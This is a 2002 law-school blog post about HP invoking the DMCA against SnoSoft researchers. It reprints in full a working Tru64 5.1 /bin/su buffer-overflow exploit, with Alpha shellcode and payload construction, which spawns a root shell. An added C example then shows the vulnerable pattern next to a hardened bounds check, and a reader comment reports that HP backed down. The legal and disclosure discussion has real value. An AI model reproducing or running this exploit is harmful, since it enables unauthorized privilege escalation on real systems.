LawMeme LawMeme Yale Law School  
 
HP Uses DMCA to Halt Security Researchers
Posted by Raul Ruiz on Tuesday, July 30 @ 23:40:42 EDT Digital Millennium Copyright Act

C|NET is reporting that Hewlett Packard is using the DMCA to threaten a team of researchers who disseminated information pertaining to a buffer overflow vulnerability in HP's Tru64 Unix operating system. A researcher at SnoSoft posted a link to the source code via SecurityFocus.com's Bugtraq mailing list.

In his letter to SnoSoft, Kent Ferson, Vice President of HP's UNIX Systems Unit, claims that SnoSoft is violating the DMCA as well as the Computer Fraud and Abuse Act. For research purposes, I post the source code below so that users may see what a buffer overflow is.



The source code to this exploit almost seems routine, in the sense that it is the traditional buffer overflow. Buffer overflows occur when a program writes data beyond the end of a buffer. While simple buffer overflows will cause a segmentation fault, experienced programmers can saturate the buffer enough to overwrite the program's instruction pointer, a pointer that tells the program what to do next. How does this program override the pointer and tell the computer what to do next? It injects program code into the buffer by way of the shellcode[] array. The implementation is below.

/*
 /bin/su tru64 5.1
 works with non-exec stack enabled
 
 stripey is the man

 developed at http://www.snosoft.com in the cerebrum labs

 phased
 phased at mail.ru
*/

#include <stdio.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>

char shellcode[]=
	"\x30\x15\xd9\x43"      /* subq $30,200,$16             */
	"\x11\x74\xf0\x47"      /* bis $31,0x83,$17             */
	"\x12\x14\x02\x42"      /* addq $16,16,$18              */
	"\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
	"\x12\x94\x09\x42"      /* addq $16,76,$18              */
	"\xfc\xff\x32\xb2"      /* stl $17,-4($18)              */
	"\xff\x47\x3f\x26"      /* ldah $17,0x47ff($31)         */
	"\x1f\x04\x31\x22"      /* lda $17,0x041f($17)          */
	"\xfc\xff\x30\xb2"      /* stl $17,-4($16)              */
	"\xf7\xff\x1f\xd2"      /* bsr $16,-32                  */
	"\x10\x04\xff\x47"      /* clr $16                      */
	"\x11\x14\xe3\x43"      /* addq $31,24,$17              */
	"\x20\x35\x20\x42"      /* subq $17,1,$0                */
	"\xff\xff\xff\xff"      /* callsys ( disguised )        */
	"\x30\x15\xd9\x43"      /* subq $30,200,$16             */
	"\x31\x15\xd8\x43"      /* subq $30,192,$17             */
	"\x12\x04\xff\x47"      /* clr $18                      */
	"\x40\xff\x1e\xb6"      /* stq $16,-192($30)            */
	"\x48\xff\xfe\xb7"      /* stq $31,-184($30)            */
	"\x98\xff\x7f\x26"      /* ldah $19,0xff98($31)         */
	"\xd0\x8c\x73\x22"      /* lda $19,0x8cd0($19)          */
	"\x13\x05\xf3\x47"      /* ornot $31,$19,$19            */
	"\x3c\xff\x7e\xb2"      /* stl $19,-196($30)            */
	"\x69\x6e\x7f\x26"      /* ldah $19,0x6e69($31)         */
	"\x2f\x62\x73\x22"      /* lda $19,0x622f($19)          */
	"\x38\xff\x7e\xb2"      /* stl $19,-200($30)            */
	"\x13\x94\xe7\x43"      /* addq $31,60,$19              */
	"\x20\x35\x60\x42"      /* subq $19,1,$0                */
	"\xff\xff\xff\xff";     /* callsys ( disguised )        */

/* shellcode by Taeho Oh */

main(int argc, char *argv[]) {
int i, j;
char buffer[8239];
char payload[15200];
char nop[] = "\x1f\x04\xff\x47";

bzero(&buffer, 8239);
bzero(&payload, 15200);

for (i=0;i<8233;i++)
        buffer[i] = 0x41;

/* 0x140010401 */

        buffer[i++] = 0x01;
        buffer[i++] = 0x04;
        buffer[i++] = 0x01;
        buffer[i++] = 0x40;
        buffer[i++] = 0x01;

for (i=0;i<15000;) {
	for(j=0;j<4;j++)  {
        	payload[i++] = nop[j];
	}
}

for (i=i,j=0;j<sizeof(shellcode);i++,j++)
	payload[i] = shellcode[j];

	printf("/bin/su by phased\n");
	printf("payload %db\n", strlen(payload));
	printf("buffer %db\n", strlen(buffer));

	execl("/usr/bin/su", "su", buffer, payload, 0);

}
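
The bounds check whose absence this kind of overflow depends on, as an added example (not code from the post, SnoSoft or HP). The 32-byte limit and the function names are assumptions, since the page does not show su's source; only the 8238-byte argument length is taken from the program above.

```c
#include <stddef.h>
#include <string.h>

#define USERNAME_MAX 32   /* assumed limit; the page does not show su's buffer */
#define SAMPLE_LEN 8238   /* length of the first argument built on this page */

/* Vulnerable pattern, for contrast only and never called: strcpy() stops at
 * the NUL byte, not at the end of name[], so a longer argument overwrites
 * whatever follows the buffer on the stack. */
void store_username_unsafe(const char *arg)
{
    char name[USERNAME_MAX];
    strcpy(name, arg);
    (void)name;
}

/* Hardened form: measure within the bound, reject rather than truncate (a
 * truncated name could match another account), refuse non-printable bytes. */
int store_username(char *dst, size_t dstsz, const char *arg)
{
    size_t len, i;

    if (dst == NULL || arg == NULL || dstsz == 0)
        return -1;
    for (len = 0; len < dstsz && arg[len] != '\0'; len++)
        ;                               /* never reads past dstsz bytes */
    if (len == 0 || len >= dstsz)
        return -1;                      /* empty, or no room for the NUL */
    for (i = 0; i < len; i++)
        if ((unsigned char)arg[i] < 0x21 || (unsigned char)arg[i] > 0x7e)
            return -1;
    memcpy(dst, arg, len + 1);
    return 0;
}

/* Constructed sample: filler bytes of the same length as the page's first
 * argument. Returns what store_username() decides about it. */
int check_overlong_sample(void)
{
    static char sample[SAMPLE_LEN + 1];
    char dst[USERNAME_MAX];

    memset(sample, 0x41, SAMPLE_LEN);
    return store_username(dst, sizeof dst, sample);
}
```

Rejecting the over-long argument before any copy means the length of attacker-supplied input never decides how much of the stack is written.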

 
HP Backs Down (Score: 1)
by Rob_Heverly (robert.heverly-at-yale.edu) on Thursday, August 01 @ 23:00:07 EDT
http://www.law.yale.edu/isp/
Declan McCullagh is reporting that HP has seriously backed away from its DMCA threats.




Leges humanae nascuntur, vivunt, moriuntur
Human laws are born, live, and die


All stories, comments and submissions copyright their respective posters.
Everything Else Copyright (c) 2002 by the Information Society Project.
This material may be distributed only subject to the terms and conditions set forth in the Open Publication License, v1.0 or later (the latest version is presently available at http://www.opencontent.org/openpub/).
